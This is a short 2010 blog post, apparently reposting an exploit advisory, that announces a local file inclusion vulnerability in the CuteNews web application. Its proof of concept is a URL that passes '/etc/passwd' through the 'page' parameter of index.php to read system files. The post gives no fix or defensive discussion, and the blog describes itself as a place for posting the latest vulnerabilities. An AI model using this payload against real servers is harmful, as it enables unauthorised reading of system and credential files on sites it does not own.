Tuesday, October 5, 2010

CuteNews (page) local File Inclusion Vulnerability

0
in

CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

-=[p0c]=-

http://127.0.0.1/index.php?page= [lfi]
or
http://127.0.0.1/path/index.php?page=/etc/passwdt

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting